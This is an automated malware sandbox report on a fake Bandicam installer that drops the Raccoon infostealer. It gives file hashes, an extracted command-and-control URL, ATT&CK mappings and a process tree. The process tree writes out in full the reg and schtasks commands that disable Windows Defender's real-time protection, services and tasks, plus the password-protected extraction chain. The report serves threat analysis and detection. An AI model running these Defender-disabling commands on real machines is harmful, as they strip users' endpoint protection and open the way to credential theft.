Analysis

  • max time kernel
    153s
  • max time network
    161s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20220414-en
  • submitted
    27-04-2022 14:13

General

  • Target

    929b4dbb9140752a54349be0f03562bc55baef8ebfb89b3ad3473a1d3293bc64.exe

  • Size

    26.2MB

  • MD5

    ecfc75cc9d669c8f711435eec0528863

  • SHA1

    dba66bf4b41d5c252b9a21b00ea7cb14673f02ca

  • SHA256

    929b4dbb9140752a54349be0f03562bc55baef8ebfb89b3ad3473a1d3293bc64

  • SHA512

    eb5271764979d6f64f4c68fe3ec07b960b11848485284206f798f201d5492c595b732de839fa6cde7429357bdfd139e875f6fcd05b9dea18ad3293549be789fd

Malware Config

Extracted

Family

raccoon

Version

1.7.1-hotfix

Botnet

0422feff6c251ddfdca83125d9b8ae570db3b316

Attributes
  • url4cnc

    https://telete.in/jbitchsucks

rc4.plain
rc4.plain

Signatures

  • Modifies Windows Defender Real-time Protection settings 3 TTPs
  • Modifies security service 2 TTPs 1 IoCs
  • Raccoon

    Simple but powerful infostealer which was very active in 2019.

  • Raccoon Stealer Payload 3 IoCs
  • Executes dropped EXE 9 IoCs
  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Loads dropped DLL 9 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Drops file in Program Files directory 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Delays execution with timeout.exe 1 IoCs
  • Modifies registry class 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 17 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\929b4dbb9140752a54349be0f03562bc55baef8ebfb89b3ad3473a1d3293bc64.exe
    "C:\Users\Admin\AppData\Local\Temp\929b4dbb9140752a54349be0f03562bc55baef8ebfb89b3ad3473a1d3293bc64.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1628
    • C:\Users\Admin\AppData\Local\Temp\is-8SFAP.tmp\929b4dbb9140752a54349be0f03562bc55baef8ebfb89b3ad3473a1d3293bc64.tmp
      "C:\Users\Admin\AppData\Local\Temp\is-8SFAP.tmp\929b4dbb9140752a54349be0f03562bc55baef8ebfb89b3ad3473a1d3293bc64.tmp" /SL5="$201C6,26712783,760832,C:\Users\Admin\AppData\Local\Temp\929b4dbb9140752a54349be0f03562bc55baef8ebfb89b3ad3473a1d3293bc64.exe"
      2⤵
      • Executes dropped EXE
      • Checks computer location settings
      • Loads dropped DLL
      • Drops file in Program Files directory
      • Modifies registry class
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of FindShellTrayWindow
      • Suspicious use of WriteProcessMemory
      PID:1512
      • C:\Windows\SysWOW64\WScript.exe
        "C:\Windows\System32\WScript.exe" "C:\ProgramData\17oxMiw\MMF.vbs"
        3⤵
        • Checks computer location settings
        • Suspicious use of WriteProcessMemory
        PID:620
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c ""C:\ProgramData\17oxMiw\DisableOAVProtection.bat" "
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:1368
          • C:\Windows\SysWOW64\reg.exe
            reg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f
            5⤵
              PID:2084
            • C:\Windows\SysWOW64\reg.exe
              reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
              5⤵
                PID:4132
              • C:\Windows\SysWOW64\reg.exe
                reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f
                5⤵
                  PID:4536
                • C:\Windows\SysWOW64\reg.exe
                  reg add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f
                  5⤵
                    PID:4388
                  • C:\Windows\SysWOW64\reg.exe
                    reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
                    5⤵
                      PID:368
                    • C:\Windows\SysWOW64\reg.exe
                      reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f
                      5⤵
                        PID:4428
                      • C:\Windows\SysWOW64\reg.exe
                        reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
                        5⤵
                          PID:3084
                        • C:\Windows\SysWOW64\reg.exe
                          reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f
                          5⤵
                            PID:1808
                          • C:\Windows\SysWOW64\reg.exe
                            reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
                            5⤵
                              PID:2144
                            • C:\Windows\SysWOW64\reg.exe
                              reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f
                              5⤵
                                PID:4036
                              • C:\Windows\SysWOW64\reg.exe
                                reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f
                                5⤵
                                  PID:4532
                                • C:\Windows\SysWOW64\reg.exe
                                  reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f
                                  5⤵
                                    PID:4700
                                  • C:\Windows\SysWOW64\reg.exe
                                    reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "0" /f
                                    5⤵
                                      PID:5068
                                    • C:\Windows\SysWOW64\reg.exe
                                      reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f
                                      5⤵
                                        PID:2324
                                      • C:\Windows\SysWOW64\reg.exe
                                        reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f
                                        5⤵
                                          PID:3596
                                        • C:\Windows\SysWOW64\schtasks.exe
                                          schtasks /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable
                                          5⤵
                                            PID:1048
                                          • C:\Windows\SysWOW64\schtasks.exe
                                            schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable
                                            5⤵
                                              PID:1372
                                            • C:\Windows\SysWOW64\schtasks.exe
                                              schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable
                                              5⤵
                                                PID:4196
                                              • C:\Windows\SysWOW64\schtasks.exe
                                                schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable
                                                5⤵
                                                  PID:1160
                                                • C:\Windows\SysWOW64\schtasks.exe
                                                  schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable
                                                  5⤵
                                                    PID:2792
                                                  • C:\Windows\SysWOW64\reg.exe
                                                    reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "Windows Defender" /f
                                                    5⤵
                                                      PID:4932
                                                    • C:\Windows\SysWOW64\reg.exe
                                                      reg delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Defender" /f
                                                      5⤵
                                                        PID:3032
                                                      • C:\Windows\SysWOW64\reg.exe
                                                        reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefender" /f
                                                        5⤵
                                                          PID:3832
                                                        • C:\Windows\SysWOW64\reg.exe
                                                          reg delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f
                                                          5⤵
                                                            PID:800
                                                          • C:\Windows\SysWOW64\reg.exe
                                                            reg delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f
                                                            5⤵
                                                              PID:3612
                                                            • C:\Windows\SysWOW64\reg.exe
                                                              reg delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f
                                                              5⤵
                                                                PID:3004
                                                              • C:\Windows\SysWOW64\reg.exe
                                                                reg add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f
                                                                5⤵
                                                                  PID:3128
                                                                • C:\Windows\SysWOW64\reg.exe
                                                                  reg add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f
                                                                  5⤵
                                                                    PID:3520
                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                    reg add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f
                                                                    5⤵
                                                                      PID:2524
                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                      reg add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f
                                                                      5⤵
                                                                        PID:4000
                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                        reg add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f
                                                                        5⤵
                                                                        • Modifies security service
                                                                        PID:4316
                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                        reg add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f
                                                                        5⤵
                                                                          PID:2336
                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                        C:\Windows\system32\cmd.exe /c ""C:\ProgramData\17oxMiw\main.bat" "
                                                                        4⤵
                                                                        • Suspicious use of WriteProcessMemory
                                                                        PID:2700
                                                                        • C:\Windows\SysWOW64\mode.com
                                                                          mode 65,10
                                                                          5⤵
                                                                            PID:1076
                                                                          • C:\ProgramData\17oxMiw\7z.exe
                                                                            7z.exe e file.zip -p___________24167pwd79pwd22684___________ -oextracted
                                                                            5⤵
                                                                            • Executes dropped EXE
                                                                            • Loads dropped DLL
                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                            PID:1712
                                                                          • C:\ProgramData\17oxMiw\7z.exe
                                                                            7z.exe e extracted/file_3.zip -oextracted
                                                                            5⤵
                                                                            • Executes dropped EXE
                                                                            • Loads dropped DLL
                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                            PID:4580
                                                                          • C:\ProgramData\17oxMiw\7z.exe
                                                                            7z.exe e extracted/file_2.zip -oextracted
                                                                            5⤵
                                                                            • Executes dropped EXE
                                                                            • Loads dropped DLL
                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                            PID:2512
                                                                          • C:\ProgramData\17oxMiw\7z.exe
                                                                            7z.exe e extracted/file_1.zip -oextracted
                                                                            5⤵
                                                                            • Executes dropped EXE
                                                                            • Loads dropped DLL
                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                            PID:5048
                                                                          • C:\ProgramData\17oxMiw\nmhost.exe
                                                                            "nmhost.exe"
                                                                            5⤵
                                                                            • Executes dropped EXE
                                                                            • Suspicious use of SetThreadContext
                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                            PID:448
                                                                            • C:\ProgramData\17oxMiw\nmhost.exe
                                                                              "nmhost.exe"
                                                                              6⤵
                                                                              • Executes dropped EXE
                                                                              PID:8
                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                          C:\Windows\system32\cmd.exe /c ""C:\ProgramData\17oxMiw\DiskRemoval.bat" "
                                                                          4⤵
                                                                          • Suspicious use of WriteProcessMemory
                                                                          PID:3700
                                                                          • C:\Windows\SysWOW64\timeout.exe
                                                                            timeout /T 60 /NOBREAK
                                                                            5⤵
                                                                            • Delays execution with timeout.exe
                                                                            PID:3408
                                                                      • C:\Program Files (x86)\Bandicam.4.5.8.1673.exe
                                                                        "C:\Program Files (x86)\Bandicam.4.5.8.1673.exe"
                                                                        3⤵
                                                                        • Executes dropped EXE
                                                                        • Suspicious use of WriteProcessMemory
                                                                        PID:4528
                                                                        • C:\Users\Admin\AppData\Local\Temp\is-LUSMS.tmp\Bandicam.4.5.8.1673.tmp
                                                                          "C:\Users\Admin\AppData\Local\Temp\is-LUSMS.tmp\Bandicam.4.5.8.1673.tmp" /SL5="$1020C,22575714,93696,C:\Program Files (x86)\Bandicam.4.5.8.1673.exe"
                                                                          4⤵
                                                                          • Executes dropped EXE
                                                                          • Loads dropped DLL
                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                          PID:2504

                                                                  Network

                                                                  MITRE ATT&CK Matrix ATT&CK v6

                                                                  Persistence

                                                                  Modify Existing Service

                                                                  2
                                                                  T1031

                                                                  Defense Evasion

                                                                  Modify Registry

                                                                  2
                                                                  T1112

                                                                  Disabling Security Tools

                                                                  1
                                                                  T1089

                                                                  Discovery

                                                                  Query Registry

                                                                  1
                                                                  T1012

                                                                  System Information Discovery

                                                                  2
                                                                  T1082

                                                                  Replay Monitor

                                                                  Loading Replay Monitor...

                                                                  Downloads

                                                                  • C:\Program Files (x86)\Bandicam.4.5.8.1673.exe
                                                                    Filesize

                                                                    21.9MB

                                                                    MD5

                                                                    a6627fb2c2e3874325259bf000571fdf

                                                                    SHA1

                                                                    3d521136f3445aae539080e74a80d40a67d543a2

                                                                    SHA256

                                                                    dbc86639649df20836a209414eeaed1e83b4e0d26d82f5e94c671d36d9da7738

                                                                    SHA512

                                                                    122a996be74b2a971fac731a6058e59d2c57497db52ced2e6a8ad46e81c367111a0e3a0d32dfc585a77b43d84d7e0b1e7a00f465e8f9ad66d63df1fe309bdca3

                                                                  • C:\Program Files (x86)\Bandicam.4.5.8.1673.exe
                                                                    Filesize

                                                                    21.9MB

                                                                    MD5

                                                                    a6627fb2c2e3874325259bf000571fdf

                                                                    SHA1

                                                                    3d521136f3445aae539080e74a80d40a67d543a2

                                                                    SHA256

                                                                    dbc86639649df20836a209414eeaed1e83b4e0d26d82f5e94c671d36d9da7738

                                                                    SHA512

                                                                    122a996be74b2a971fac731a6058e59d2c57497db52ced2e6a8ad46e81c367111a0e3a0d32dfc585a77b43d84d7e0b1e7a00f465e8f9ad66d63df1fe309bdca3

                                                                  • C:\ProgramData\17oxMiw\7z.dll
                                                                    Filesize

                                                                    1.6MB

                                                                    MD5

                                                                    72491c7b87a7c2dd350b727444f13bb4

                                                                    SHA1

                                                                    1e9338d56db7ded386878eab7bb44b8934ab1bc7

                                                                    SHA256

                                                                    34ad9bb80fe8bf28171e671228eb5b64a55caa388c31cb8c0df77c0136735891

                                                                    SHA512

                                                                    583d0859d29145dfc48287c5a1b459e5db4e939624bd549ff02c61eae8a0f31fc96a509f3e146200cdd4c93b154123e5adfbfe01f7d172db33968155189b5511

                                                                  • C:\ProgramData\17oxMiw\7z.dll
                                                                    Filesize

                                                                    1.6MB

                                                                    MD5

                                                                    72491c7b87a7c2dd350b727444f13bb4

                                                                    SHA1

                                                                    1e9338d56db7ded386878eab7bb44b8934ab1bc7

                                                                    SHA256

                                                                    34ad9bb80fe8bf28171e671228eb5b64a55caa388c31cb8c0df77c0136735891

                                                                    SHA512

                                                                    583d0859d29145dfc48287c5a1b459e5db4e939624bd549ff02c61eae8a0f31fc96a509f3e146200cdd4c93b154123e5adfbfe01f7d172db33968155189b5511

                                                                  • C:\ProgramData\17oxMiw\7z.dll
                                                                    Filesize

                                                                    1.6MB

                                                                    MD5

                                                                    72491c7b87a7c2dd350b727444f13bb4

                                                                    SHA1

                                                                    1e9338d56db7ded386878eab7bb44b8934ab1bc7

                                                                    SHA256

                                                                    34ad9bb80fe8bf28171e671228eb5b64a55caa388c31cb8c0df77c0136735891

                                                                    SHA512

                                                                    583d0859d29145dfc48287c5a1b459e5db4e939624bd549ff02c61eae8a0f31fc96a509f3e146200cdd4c93b154123e5adfbfe01f7d172db33968155189b5511

                                                                  • C:\ProgramData\17oxMiw\7z.dll
                                                                    Filesize

                                                                    1.6MB

                                                                    MD5

                                                                    72491c7b87a7c2dd350b727444f13bb4

                                                                    SHA1

                                                                    1e9338d56db7ded386878eab7bb44b8934ab1bc7

                                                                    SHA256

                                                                    34ad9bb80fe8bf28171e671228eb5b64a55caa388c31cb8c0df77c0136735891

                                                                    SHA512

                                                                    583d0859d29145dfc48287c5a1b459e5db4e939624bd549ff02c61eae8a0f31fc96a509f3e146200cdd4c93b154123e5adfbfe01f7d172db33968155189b5511

                                                                  • C:\ProgramData\17oxMiw\7z.dll
                                                                    Filesize

                                                                    1.6MB

                                                                    MD5

                                                                    72491c7b87a7c2dd350b727444f13bb4

                                                                    SHA1

                                                                    1e9338d56db7ded386878eab7bb44b8934ab1bc7

                                                                    SHA256

                                                                    34ad9bb80fe8bf28171e671228eb5b64a55caa388c31cb8c0df77c0136735891

                                                                    SHA512

                                                                    583d0859d29145dfc48287c5a1b459e5db4e939624bd549ff02c61eae8a0f31fc96a509f3e146200cdd4c93b154123e5adfbfe01f7d172db33968155189b5511

                                                                  • C:\ProgramData\17oxMiw\7z.exe
                                                                    Filesize

                                                                    458KB

                                                                    MD5

                                                                    619f7135621b50fd1900ff24aade1524

                                                                    SHA1

                                                                    6c7ea8bbd435163ae3945cbef30ef6b9872a4591

                                                                    SHA256

                                                                    344f076bb1211cb02eca9e5ed2c0ce59bcf74ccbc749ec611538fa14ecb9aad2

                                                                    SHA512

                                                                    2c7293c084d09bc2e3ae2d066dd7b331c810d9e2eeca8b236a8e87fdeb18e877b948747d3491fcaff245816507685250bd35f984c67a43b29b0ae31ecb2bd628

                                                                  • C:\ProgramData\17oxMiw\7z.exe
                                                                    Filesize

                                                                    458KB

                                                                    MD5

                                                                    619f7135621b50fd1900ff24aade1524

                                                                    SHA1

                                                                    6c7ea8bbd435163ae3945cbef30ef6b9872a4591

                                                                    SHA256

                                                                    344f076bb1211cb02eca9e5ed2c0ce59bcf74ccbc749ec611538fa14ecb9aad2

                                                                    SHA512

                                                                    2c7293c084d09bc2e3ae2d066dd7b331c810d9e2eeca8b236a8e87fdeb18e877b948747d3491fcaff245816507685250bd35f984c67a43b29b0ae31ecb2bd628

                                                                  • C:\ProgramData\17oxMiw\7z.exe
                                                                    Filesize

                                                                    458KB

                                                                    MD5

                                                                    619f7135621b50fd1900ff24aade1524

                                                                    SHA1

                                                                    6c7ea8bbd435163ae3945cbef30ef6b9872a4591

                                                                    SHA256

                                                                    344f076bb1211cb02eca9e5ed2c0ce59bcf74ccbc749ec611538fa14ecb9aad2

                                                                    SHA512

                                                                    2c7293c084d09bc2e3ae2d066dd7b331c810d9e2eeca8b236a8e87fdeb18e877b948747d3491fcaff245816507685250bd35f984c67a43b29b0ae31ecb2bd628

                                                                  • C:\ProgramData\17oxMiw\7z.exe
                                                                    Filesize

                                                                    458KB

                                                                    MD5

                                                                    619f7135621b50fd1900ff24aade1524

                                                                    SHA1

                                                                    6c7ea8bbd435163ae3945cbef30ef6b9872a4591

                                                                    SHA256

                                                                    344f076bb1211cb02eca9e5ed2c0ce59bcf74ccbc749ec611538fa14ecb9aad2

                                                                    SHA512

                                                                    2c7293c084d09bc2e3ae2d066dd7b331c810d9e2eeca8b236a8e87fdeb18e877b948747d3491fcaff245816507685250bd35f984c67a43b29b0ae31ecb2bd628

                                                                  • C:\ProgramData\17oxMiw\7z.exe
                                                                    Filesize

                                                                    458KB

                                                                    MD5

                                                                    619f7135621b50fd1900ff24aade1524

                                                                    SHA1

                                                                    6c7ea8bbd435163ae3945cbef30ef6b9872a4591

                                                                    SHA256

                                                                    344f076bb1211cb02eca9e5ed2c0ce59bcf74ccbc749ec611538fa14ecb9aad2

                                                                    SHA512

                                                                    2c7293c084d09bc2e3ae2d066dd7b331c810d9e2eeca8b236a8e87fdeb18e877b948747d3491fcaff245816507685250bd35f984c67a43b29b0ae31ecb2bd628

                                                                  • C:\ProgramData\17oxMiw\DisableOAVProtection.bat
                                                                    Filesize

                                                                    33KB

                                                                    MD5

                                                                    c97c64f53865b9da2a642d36b02df043

                                                                    SHA1

                                                                    181ca1deb68409feae2e70ebf347b3111218a47a

                                                                    SHA256

                                                                    1e37317e8e44fcf8ee132870eb137021e8828be99dcc69d1167f1bce9fb24e17

                                                                    SHA512

                                                                    05ef252545d9315a100ba2e109499c0596fd8a0d02679e42d0e3a2f3047518ded7cf342ce9c414b48387ff102d516c3fbc7b4dcbf1bb445e2a23ed9c6092ec2c

                                                                  • C:\ProgramData\17oxMiw\DiskRemoval.bat
                                                                    Filesize

                                                                    211B

                                                                    MD5

                                                                    0f00552cee3a31dc4e8adc2738ca6d76

                                                                    SHA1

                                                                    85f0353b58b6749eee6b06101b05db242d44d0c2

                                                                    SHA256

                                                                    1094424ae118bb1060b5f4057c6b1d8b2eef2213bab3cf2b0a2cc6a4009552d8

                                                                    SHA512

                                                                    137c48422710fc898cfc1dd5f70f8fe2a505de030594c732255de62c73b22305acdd5340ff5a49fa8ddc3af5285f5a970158e53d0b74f9728ec0844e2587d835

                                                                  • C:\ProgramData\17oxMiw\MMF.vbs
                                                                    Filesize

                                                                    20KB

                                                                    MD5

                                                                    fa6dcfa398aff28ba12687272732eb51

                                                                    SHA1

                                                                    f207b64cfd0270d6f2222e2fac98ef9c262dd313

                                                                    SHA256

                                                                    f2df2c8ac96c7c2e54afe992b302d823dc62d5754b6882b5ffdf19c293fc298d

                                                                    SHA512

                                                                    9064b3a25b2c1dcfd2d91ec28fe4e61843739d3fc6a630bf46055b8e6198b546398e06e81c62a7ae47c8316f162145b81d228d3bcbc5a9ee44b458aba6f59dfd

                                                                  • C:\ProgramData\17oxMiw\extracted\ANTIAV~1.DAT
                                                                    Filesize

                                                                    2.0MB

                                                                    MD5

                                                                    e177d8a197054920edc50c867c4d83c7

                                                                    SHA1

                                                                    93a9a13cb0e431d5d16c8d4656a71fe799e293b6

                                                                    SHA256

                                                                    91660c99fa87b69b7580ce7ce912120972e035f6ec058d9c1459f4f57098dfaf

                                                                    SHA512

                                                                    a39d0ee3e5f54366992dad2287bb2987b3d5aa4cb9b89354f43b36dcd57d466391e9927893803456a2b9fa19841eb0162dd2b4d97adba03ffe2005f1d51bd3a0

                                                                  • C:\ProgramData\17oxMiw\extracted\file_1.zip
                                                                    Filesize

                                                                    711KB

                                                                    MD5

                                                                    68c03d9f4ec112a706451e52ab0d0b6f

                                                                    SHA1

                                                                    70e4273937d277b2eb31cc355dafb614e7d92f0f

                                                                    SHA256

                                                                    2187fcb6ee171a80c7095fc4ce893ca4f543821a5dfed8e3ee4c16b5846cf5c2

                                                                    SHA512

                                                                    450255afb9105294a952bf53cb2ac6fdacfd000d10596b64e464566c3bdd23af127767ab4117b67195f4e6eed3e7b7470cd5254a2bc8e2c20f2a68dcfaf3cde0

                                                                  • C:\ProgramData\17oxMiw\extracted\file_2.zip
                                                                    Filesize

                                                                    711KB

                                                                    MD5

                                                                    465948131d48f0baa17e0bf956d05809

                                                                    SHA1

                                                                    76c9154637e706f48201c1f2714541d992c5566e

                                                                    SHA256

                                                                    79454b0e77c513282954fe6aaf30f1a7091ecb82044c5fc6c499fd8bc60fb1ce

                                                                    SHA512

                                                                    dc42c9261855682cdfbb5a6bf07d689f6485564fa31b66cdf4930ea10e4b06a92cb6b7d06989b57766a9032e2e5a3a685cf41b9b30faeb4947f4b676b26ff1c9

                                                                  • C:\ProgramData\17oxMiw\extracted\file_3.zip
                                                                    Filesize

                                                                    2.2MB

                                                                    MD5

                                                                    fd0491fdaf5981fb3a2838a05d0eebcf

                                                                    SHA1

                                                                    327109c15b1edfa7b414becefed917d5da249365

                                                                    SHA256

                                                                    a9b1c8af8081cd01593c16558871f9e9c6ee7b5ee7642a83091ffec7bc605fc8

                                                                    SHA512

                                                                    415cff0b902334733d392809f1b7d45df237eee94d962764a07ddd551af4847ee8fde3fa37aeccca37dcfee6afc786643fc167915bc3d505ae335b098106a639

                                                                  • C:\ProgramData\17oxMiw\extracted\nmhost.exe
                                                                    Filesize

                                                                    1.2MB

                                                                    MD5

                                                                    afb2c0a5886354403bcdabb3c3f04e67

                                                                    SHA1

                                                                    8bbaed842013fd3af024fb7a59e739eff9accd80

                                                                    SHA256

                                                                    b00766e885489dd8a35ed09bc4a18d027f290a80b17721abaecd7a8f37604158

                                                                    SHA512

                                                                    6c237f09b130b3db3525c3913e609b2e30d64373f343d18f68d5e1bfbd0b8cfc983337b05af5451ed044f9424e7001d1896bb6b8968971b6584757fc5a17670d

                                                                  • C:\ProgramData\17oxMiw\file.bin
                                                                    Filesize

                                                                    2.2MB

                                                                    MD5

                                                                    790b451c8430b0c527f9ede30cce5f29

                                                                    SHA1

                                                                    5de6843d48641c14023c7f07f631f2a364697ae3

                                                                    SHA256

                                                                    777753312bb53895bb19c12c968ad5948fd4adcc534dee97d32b570fd6b827a7

                                                                    SHA512

                                                                    168ab36305b68e145ff7623ea611dba3ac3e1d6354ae9b3b8f621a179d75c07bda2237057320b440bf6a553dc48ee3a23fb4cad44dc52dc0cb62b455d2a0aafd

                                                                  • C:\ProgramData\17oxMiw\main.bat
                                                                    Filesize

                                                                    397B

                                                                    MD5

                                                                    7bcce13698737af294fffe1859c19b80

                                                                    SHA1

                                                                    33cd5b5e0c5dc1f515f93928fa6a0b0e81f591cc

                                                                    SHA256

                                                                    d5fa298b9210682b6d0d181ba1db301aa3f7eec2c69d5728cdd5c979d905e16c

                                                                    SHA512

                                                                    c491517707fa34593c4e0b66228eab2866d2c36f59377b2f2328e3dd88653e5cd64bdd6d07bf8fc8481fee02f34cd01c1d836aebacf6ffb89ea67f3ff4aa8d18

                                                                  • C:\ProgramData\17oxMiw\nmhost.exe
                                                                    Filesize

                                                                    1.2MB

                                                                    MD5

                                                                    afb2c0a5886354403bcdabb3c3f04e67

                                                                    SHA1

                                                                    8bbaed842013fd3af024fb7a59e739eff9accd80

                                                                    SHA256

                                                                    b00766e885489dd8a35ed09bc4a18d027f290a80b17721abaecd7a8f37604158

                                                                    SHA512

                                                                    6c237f09b130b3db3525c3913e609b2e30d64373f343d18f68d5e1bfbd0b8cfc983337b05af5451ed044f9424e7001d1896bb6b8968971b6584757fc5a17670d

                                                                  • C:\ProgramData\17oxMiw\nmhost.exe
                                                                    Filesize

                                                                    1.2MB

                                                                    MD5

                                                                    afb2c0a5886354403bcdabb3c3f04e67

                                                                    SHA1

                                                                    8bbaed842013fd3af024fb7a59e739eff9accd80

                                                                    SHA256

                                                                    b00766e885489dd8a35ed09bc4a18d027f290a80b17721abaecd7a8f37604158

                                                                    SHA512

                                                                    6c237f09b130b3db3525c3913e609b2e30d64373f343d18f68d5e1bfbd0b8cfc983337b05af5451ed044f9424e7001d1896bb6b8968971b6584757fc5a17670d

                                                                  • C:\Users\Admin\AppData\Local\Temp\is-8SFAP.tmp\929b4dbb9140752a54349be0f03562bc55baef8ebfb89b3ad3473a1d3293bc64.tmp
                                                                    Filesize

                                                                    2.5MB

                                                                    MD5

                                                                    5cea51722c4aebe9322f76a27370d7d8

                                                                    SHA1

                                                                    1e479681b9a61d7f42ed349780f0ae93f477b4c8

                                                                    SHA256

                                                                    a1b1f6c621428e180248736534ac0d23531f50ecaceaadfe420fed026ecc45a0

                                                                    SHA512

                                                                    fb10d9fce508894624902fbc18318b7fcfa0310141e340060b715ba0b060cfb04ecc9489d65915e50df1c74c47ced74ee69f0a668febe4f460ec409b4dcf7d87

                                                                  • C:\Users\Admin\AppData\Local\Temp\is-9SFKE.tmp\_isetup\_iscrypt.dll
                                                                    Filesize

                                                                    2KB

                                                                    MD5

                                                                    a69559718ab506675e907fe49deb71e9

                                                                    SHA1

                                                                    bc8f404ffdb1960b50c12ff9413c893b56f2e36f

                                                                    SHA256

                                                                    2f6294f9aa09f59a574b5dcd33be54e16b39377984f3d5658cda44950fa0f8fc

                                                                    SHA512

                                                                    e52e0aa7fe3f79e36330c455d944653d449ba05b2f9abee0914a0910c3452cfa679a40441f9ac696b3ccf9445cbb85095747e86153402fc362bb30ac08249a63

                                                                  • C:\Users\Admin\AppData\Local\Temp\is-JPIEG.tmp\b2p.dll
                                                                    Filesize

                                                                    22KB

                                                                    MD5

                                                                    ab35386487b343e3e82dbd2671ff9dab

                                                                    SHA1

                                                                    03591d07aea3309b631a7d3a6e20a92653e199b8

                                                                    SHA256

                                                                    c3729545522fcff70db61046c0efd962df047d40e3b5ccd2272866540fc872b2

                                                                    SHA512

                                                                    b67d7384c769b2b1fdd3363fc3b47d300c2ea4d37334acfd774cf29169c0a504ba813dc3ecbda5b71a3f924110a77a363906b16a87b4b1432748557567d1cf09

                                                                  • C:\Users\Admin\AppData\Local\Temp\is-JPIEG.tmp\botva2.dll
                                                                    Filesize

                                                                    37KB

                                                                    MD5

                                                                    67965a5957a61867d661f05ae1f4773e

                                                                    SHA1

                                                                    f14c0a4f154dc685bb7c65b2d804a02a0fb2360d

                                                                    SHA256

                                                                    450b9b0ba25bf068afbc2b23d252585a19e282939bf38326384ea9112dfd0105

                                                                    SHA512

                                                                    c6942818b9026dc5db2d62999d32cf99fe7289f79a28b8345af17acf9d13b2229a5e917a48ff1f6d59715bdbcb00c1625e0302abcfe10ca7e0475762e0a3f41b

                                                                  • C:\Users\Admin\AppData\Local\Temp\is-JPIEG.tmp\botva2.dll
                                                                    Filesize

                                                                    37KB

                                                                    MD5

                                                                    67965a5957a61867d661f05ae1f4773e

                                                                    SHA1

                                                                    f14c0a4f154dc685bb7c65b2d804a02a0fb2360d

                                                                    SHA256

                                                                    450b9b0ba25bf068afbc2b23d252585a19e282939bf38326384ea9112dfd0105

                                                                    SHA512

